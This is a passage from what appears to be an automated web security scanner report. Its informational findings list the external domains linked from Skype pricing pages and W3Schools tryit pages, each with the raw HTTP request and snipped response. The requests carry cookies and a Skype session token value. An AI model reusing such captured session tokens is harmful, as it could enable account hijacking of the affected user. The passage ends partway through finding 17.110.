<td><img class="imagePaddingStyle" height="19" width="24" src="http://www.skypeassets.com/i/images/flags/RU.png">&nbsp;&nbsp;Russia</td>
...[SNIP]...
<td><img class="imagePaddingStyle" height="19" width="24" src="http://www.skypeassets.com/i/images/flags/JP.png">&nbsp;&nbsp;Japan</td>
...[SNIP]...
<span class="specialCreditIcon">
<img src="http://www.skypeassets.com/content/dam/skype/images/icons/specialCreditIcon.png"/>
</span>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2609787;type=displ949;cat=group502;ord=1;num=1?" width="1" height="1" frameborder="0" style="display:none"></iframe>
...[SNIP]...

17.103. http://www.skype.com/intl/en-us/prices/premium  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/premium

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /intl/en-us/prices/premium?cm_mmc=Skype-_-Dynamic_Content-_-Premium HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.skype.com
Cookie: VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:10 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 54583
Content-Type: text/html; charset=utf-8
Content-Language: en


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype Premium - Buy enhanced access to Skype features - Skype</title>
   <meta name="descr
...[SNIP]...
<!-- Icon -->
   <link rel="icon" href="http://www.skypeassets.com/i/images/icons/favicon.ico" type="image/vnd.microsoft.icon"/>
   <link rel="shortcut icon" href="http://www.skypeassets.com/i/images/icons/favicon.ico"/>
   <link rel="apple-touch-icon" href="http://www.skypeassets.com/i/images/logos/skype_webclip.png"/>

   <!-- Canonical link -->
...[SNIP]...
<!-- Feed -->
   <link rel="alternate" type="application/rss+xml" title="RSS" href="http://feeds.feedburner.com/ShareSkypeEn"/>

   <!-- Default stylesheets -->
   <link rel="stylesheet" href="http://www.skypeassets.com/i/css/turbo/full.css?cdca19a5694660d70e08a2bee6159317" type="text/css" media="screen"/>


   <!-- Default javascripts -->
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</span>
                   <img class="arrow" alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"/>
                   <select class="userLanguage" name="userLanguage" dir="ltr">
...[SNIP]...
<div class="variableHero noMinHeight">
       <img class="main" src="http://www.skypeassets.com/content/dam/skype/images/site/prices/skype-premium-header-2.jpg" alt="" height="325" width="600">
       <div class="copy">
...[SNIP]...
<td class="features"><img alt="" src="http://www.skypeassets.com/content/dam/skype/images/site/prices/uscanada-calling-30.png"/><h4>
...[SNIP]...
<div class="checked first"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="checked last"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="cross"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="cross"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div></td>
<td><div class="cross"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<td class="features"><img alt="" src="http://www.skypeassets.com/content/dam/skype/images/site/prices/gvc-30.png"/><h4>
...[SNIP]...
<div class="checked first"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="checked"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="checked"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="checked last"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div></td>
<td><div class="cross"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<td class="features"><img alt="" src="http://www.skypeassets.com/content/dam/skype/images/site/prices/gvc-30.png"/><h4>
...[SNIP]...
<div class="checked first"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="checked"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="checked"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="checked last"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div></td>
<td><div class="cross"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<td class="features"><img alt="" src="http://www.skypeassets.com/content/dam/skype/images/site/prices/instant-message-30.png"/><h4>
...[SNIP]...
<div class="checked first"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="checked"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="checked"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="checked last"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div></td>
<td><div class="cross"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<td class="features"><img alt="" src="http://www.skypeassets.com/content/dam/skype/images/site/prices/customer-service-30.png"/><h4>
...[SNIP]...
<div class="checked first"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="checked"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="checked last"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="cross"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div></td>
<td><div class="cross"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<td class="features"><img alt="" src="http://www.skypeassets.com/content/dam/skype/images/site/prices/conference-30.png"/><h4>
...[SNIP]...
<div class="checked first"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="checked"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="checked"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="checked"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div></td>
<td><div class="checked last"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<td class="features"><img alt="" src="http://www.skypeassets.com/content/dam/skype/images/site/prices/instant-message-30.png"/><h4>
...[SNIP]...
<div class="checked first"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="checked"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="checked"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="checked"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div></td>
<td><div class="checked last"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<td class="features"><img alt="" src="http://www.skypeassets.com/content/dam/skype/images/site/prices/video-calls-30.png"/><h4>
...[SNIP]...
<div class="checked first"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="checked"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="checked"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="checked"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div></td>
<td><div class="checked last"><img alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"></div>
...[SNIP]...
<div class="image">
           
               
                                   <img alt="" src="http://www.skypeassets.com/content/dam/skype/images/site/prices/gvc.jpg"/>
               
           
       </div>
...[SNIP]...
<div class="image">
           
               
                                   <img alt="" src="http://www.skypeassets.com/content/dam/skype/images/site/prices/unlimited_calls_us.jpg"/>
               
           
       </div>
...[SNIP]...
<div class="image">
           
               
                                   <img alt="" src="http://www.skypeassets.com/content/dam/skype/images/site/prices/live_cs.jpg"/>
               
           
       </div>
...[SNIP]...
<div class="image">
           
               
                                   <img alt="" src="http://www.skypeassets.com/content/dam/skype/images/site/prices/webcam-discount-2-300.jpg"/>
               
           
       </div>
...[SNIP]...
<div class="image">
           
               
                                   <img alt="" src="http://www.skypeassets.com/content/dam/skype/images/site/prices/gss.jpg"/>
               
           
       </div>
...[SNIP]...
<div class="gridCol1">
           <img width="60" height="60" alt="" src="http://www.skypeassets.com/content/dam/skype/images/icons/no-emergency-calls-icon.png">
       </div>
...[SNIP]...
<a href="/go/share"><img class="email" src="http://www.skypeassets.com/i/images/icons/share-this-20x14.png" alt="Invite" height="14" width="20"/></a>
...[SNIP]...
</a>
       <img src="http://www.skypeassets.com/i/images/backgrounds/content/separator.png" alt="separator" height="35" width="1"/>
       <a href="http://twitter.com/share" class="twitter-share-button" data-count="none">Twitter</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
       <img src="http://www.skypeassets.com/i/images/backgrounds/content/separator.png" alt="separator" height="35" width="1"/>
       <div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

17.104. http://www.skype.com/intl/en-us/tell-a-friend/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/tell-a-friend/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /intl/en-us/tell-a-friend/?SkypeName=&FriendEmailAddr_1=&FriendEmailAddr_2=&FriendEmailAddr_3=&FriendEmailAddr_4=&FriendEmailAddr_5=&FriendEmailAddr_6=&FriendName_1=&FriendName_2=&FriendName_3=&FriendName_4=&FriendName_5=&FriendName_6= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170817:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; VISITORID=1344388383; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824
Host: www.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:13:39 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 46965
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<title
...[SNIP]...
<!-- Icon -->
<link rel="icon" href="http://www.skypeassets.com/i/images/icons/favicon.ico" type="image/vnd.microsoft.icon" />
<link rel="shortcut icon" href="http://www.skypeassets.com/i/images/icons/favicon.ico" />
<link rel="apple-touch-icon" href="http://www.skypeassets.com/i/images/logos/skype_webclip.png" />

<!-- Default stylesheets -->
<link rel="stylesheet" href="http://www.skypeassets.com/i/css/print.css" type="text/css" media="print" />

<link rel="stylesheet" href="http://www.skypeassets.com/i/css/complete.css" type="text/css" media="screen" />
<!-- Default javascripts -->
<script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>


<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
<!-- Feed -->
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://feeds.feedburner.com/ShareSkypeEn" />

<script type="text/javascript">
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>


<!-- EN-US stylesheets -->
<link rel="stylesheet" href="http://www.skypeassets.com/i/css/mod_us.css" type="text/css" media="screen" />


   <!-- Page specific stylesheets -->
<link rel="stylesheet" href="http://www.skypeassets.com/i/css/share.css" type="text/css" />
<link rel="stylesheet" href="http://www.skypeassets.com/i/css/formvalidate.css" type="text/css" media="screen" />
<script type="text/javascript" src="http://www.skypeassets.com/i/js/share.js"></script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/jsvalidate/jsvalidate.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<h1 class="icon"><img src="http://www.skypeassets.com/i/images/icons/share_invite_32x32_white.png" alt="" />
               Share Skype with a friend</h1>
...[SNIP]...
<div class="floatl" id="addFriendButton">
                   <img src="http://www.skypeassets.com/i/images/icons/addcontact_24x24_white.png" alt=""/>
                   <a>
...[SNIP]...
<a href="/go/downloading?cm_sp=sv|download-_-site|sidebar-_-download_lnk|en_us" title="Download Skype" class="green skype">
<img src="http://www.skypeassets.com/i/images/icons/skype_24x24_green.png" alt="Download Skype" title="Download Skype" />        
<span>
...[SNIP]...
<a href="/go/subscriptions">
<img src="http://www.skypeassets.com/i/images/icons/subscriptions_24x24_yellow.png" alt="Monthly subscription" title="Monthly subscription" />        
<span>
...[SNIP]...
<a href="/intl/en-us/allfeatures/tryforfree/?cm_sp=sv|tbyb-_-site|sidebar-_-tbyb_lnk|en_us" title="First call to a phone is on us." class="blue skype">
<img src="http://www.skypeassets.com/i/images/icons/skypecredit_24x24_blue.png" alt="Your first call is free" title="Your first call is free" />        
<span>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2609787;type=skype282;cat=paids084;ord=1;num=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

17.105. http://www.skype.com/intl/en/prices/pay-monthly/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/prices/pay-monthly/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /intl/en/prices/pay-monthly/?intcmp=search-sub HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://search2.skype.com/search/search.cgi?query=xss&collection=skype-en
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.skype.com
Proxy-Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:06:03 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 84688
Content-Type: text/html; charset=utf-8
Content-Language: en


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >

<head>
   
   <tit
...[SNIP]...
<!-- Icon -->
   <link rel="icon" href="http://www.skypeassets.com/i/images/icons/favicon.ico" type="image/vnd.microsoft.icon"/>
   <link rel="shortcut icon" href="http://www.skypeassets.com/i/images/icons/favicon.ico"/>
   <link rel="apple-touch-icon" href="http://www.skypeassets.com/i/images/logos/skype_webclip.png"/>

   <!-- Canonincal link -->
...[SNIP]...
<!-- Default stylesheets -->
   <link rel="stylesheet" href="http://www.skypeassets.com/i/css/print.css" type="text/css" media="print"/>    
   <link rel="stylesheet" href="http://www.skypeassets.com/i/css/complete.css" type="text/css" media="screen"/>
   
   <!-- Template specific stylesheets -->
...[SNIP]...
</script>

   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Feed -->
   <link rel="alternate" type="application/rss+xml" title="RSS" href="http://feeds.feedburner.com/ShareSkypeEn"/>
   
   <script type="text/javascript">
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>

   <link rel="stylesheet" href="http://www.skypeassets.com/i/css/remake.css" type="text/css" media="screen"/>
   <link rel="stylesheet" href="http://www.skypeassets.com/i/css/remake_subscriptions.css" type="text/css" media="screen"/>
   
   <script src="http://www.skypeassets.com/i/js/wanalytics/wa-subs2.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/complete_subscriptions.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</span>
                   <img class="arrow" alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"/>
                   <select class="userLanguage" name="userLanguage" dir="ltr">
...[SNIP]...
<div class="promoArea" style="width:340px; height:142px;">
       
           
           <img src="http://www.skypeassets.com/content/dam/skype/images/illustrations/discount-pink.png"/>
       
       
           <h2>
...[SNIP]...
<li class="packageDescription">
                   
                   <img class="packageIcon" src="http://www.skypeassets.com/content/dam/skype/images/world_orange.png" title="Unlimited Europe" alt="Unlimited Europe"/>
                   
                   <h2>
...[SNIP]...
<li class="packageDescription">
                   
                   <img class="packageIcon" src="http://www.skypeassets.com/content/dam/skype/images/world_orange.png" title="Unlimited North America" alt="Unlimited North America"/>
                   
                   <h2>
...[SNIP]...
<li class="packageDescription">
                   
                   <img class="packageIcon" src="http://www.skypeassets.com/content/dam/skype/images/icons/world_green_new.png" title="Unlimited World" alt="Unlimited World"/>
                   
                   <h2>
...[SNIP]...
<div class="lineSeparator section"><img width="683" height="10" alt="" src="http://www.skypeassets.com/i/images/remake/shadow_top_690_transparent.png"/>
</div>
...[SNIP]...

17.106. http://www.skype.com/intl/en/prices/premium  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/prices/premium

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /intl/en/prices/premium?intcmp=CS-Upsell-RightNav-FA10184 HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:05 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49170


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype Premium - Buy enhanced access to Skype features - Skype</title>
   <meta name="descript
...[SNIP]...
<!-- Icon -->
   <link rel="icon" href="http://www.skypeassets.com/i/images/icons/favicon.ico" type="image/vnd.microsoft.icon"/>
   <link rel="shortcut icon" href="http://www.skypeassets.com/i/images/icons/favicon.ico"/>
   <link rel="apple-touch-icon" href="http://www.skypeassets.com/i/images/logos/skype_webclip.png"/>

   <!-- Canonical link -->
...[SNIP]...
<!-- Feed -->
   <link rel="alternate" type="application/rss+xml" title="RSS" href="http://feeds.feedburner.com/ShareSkypeEn"/>

   <!-- Default stylesheets -->
   <link rel="stylesheet" href="http://www.skypeassets.com/i/css/turbo/full.css?cdca19a5694660d70e08a2bee6159317" type="text/css" media="screen"/>


   <!-- Default javascripts -->
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</span>
                   <img class="arrow" alt="" src="http://www.skypeassets.com/i/images/misc/dummy.gif"/>
                   <select class="userLanguage" name="userLanguage" dir="ltr">
...[SNIP]...
<div class="variableHero noMinHeight">
       <img class="main" src="http://www.skypeassets.com/content/dam/skype/images/site/prices/premium-hero-golden.jpg" alt="" height="463" width="940">
       <div class="copy">
...[SNIP]...
<a href="#" id="group_video_call_promo_en">
                       <img alt="" src="http://www.skypeassets.com/content/dam/skype/images/site/prices/gvc-vid-220.jpg"/>
                   </a>
...[SNIP]...
<div class="image">
           
               
                                   <img alt="" src="http://www.skypeassets.com/content/dam/skype/images/site/prices/group-screen-sharing-220.jpg"/>
               
           
       </div>
...[SNIP]...
<div class="image">
           
               
                                   <img alt="" src="http://www.skypeassets.com/content/dam/skype/images/site/prices/webcam-discount-v1-220.jpg"/>
               
           
       </div>
...[SNIP]...
<div class="image">
           
               
                                   <img alt="" src="http://www.skypeassets.com/content/dam/skype/images/site/prices/live-support-chat-220.jpg"/>
               
           
       </div>
...[SNIP]...
<div class="image">
           
               
                                   <img alt="Day pass" src="http://www.skypeassets.com/content/dam/skype/images/site/prices/premium-daily-220.png"/>
               
           
       </div>
...[SNIP]...
<div class="image">
           
               
                                   <img alt="Monthly subscription" src="http://www.skypeassets.com/content/dam/skype/images/site/prices/premium-subs-220.png"/>
               
           
       </div>
...[SNIP]...
<div class="message info largeImageAndText">
               
                   
                                           <img src="http://www.skypeassets.com/content/dam/skype/images/site/prices/skype-bluebg.png" alt="All you need for group video"/>
                   
               
               <h4>
...[SNIP]...
<div class="message info largeImageAndText">
               
                   
                                           <img src="http://www.skypeassets.com/content/dam/skype/images/site/prices/groupvideo-bluebg.png" alt="Do business better with group video calling"/>
                   
               
               <h4>
...[SNIP]...
<div class="gridCol1">
<img src="http://www.skypeassets.com/content/dam/skype/images/icons/no-emergency-calls-icon.png" alt="" height="60" width="60">
</div>
...[SNIP]...
<a href="/go/share">
               <img class="email" src="http://www.skypeassets.com/i/images/icons/share-this-20x14.png" alt="Invite" height="14" width="20"/>
           </a>
...[SNIP]...
</a>
           <img src="http://www.skypeassets.com/i/images/backgrounds/content/separator.png" alt="separator" height="35" width="1"/>
           <a class="twitterSharePh" href="http://twitter.com/share">Twitter</a>
           <img src="http://www.skypeassets.com/i/images/backgrounds/content/separator.png" alt="separator" height="35" width="1"/>
           <div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

17.107. http://www.w3schools.com/jsref/tryit.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /jsref/tryit.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /jsref/tryit.asp?filename=tryjsref_anchor_rel HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/js/js_ex_dom.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.16.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:34:03 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 2300
Content-Type: text/html
Expires: Mon, 05 Sep 2011 02:33:03 GMT
Cache-control: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<p><a id="func" rel="friend" href="http://www.functravel.com/">Cheap Flights</a>
...[SNIP]...

17.108. http://www.w3schools.com/jsref/tryit.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /jsref/tryit.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /jsref/tryit.asp?filename=tryjsref_anchor_charset HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/js/js_ex_dom.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.12.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:33:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 2562
Content-Type: text/html
Expires: Mon, 05 Sep 2011 02:32:54 GMT
Cache-control: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
</script>

<a id="google" href="http://www.google.com/">Google</a>
...[SNIP]...

17.109. http://www.w3schools.com/jsref/tryit.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /jsref/tryit.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /jsref/tryit.asp?filename=tryjsref_anchor_hreflang HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/js/js_ex_dom.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.14.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:33:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 2560
Content-Type: text/html
Expires: Mon, 05 Sep 2011 02:32:59 GMT
Cache-control: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
</script>

<a id="google" href="http://www.google.no/">Google</a>
...[SNIP]...

17.110. http://www.w3schools.com/jsref/tryit_view.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /jsref/tryit_view.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

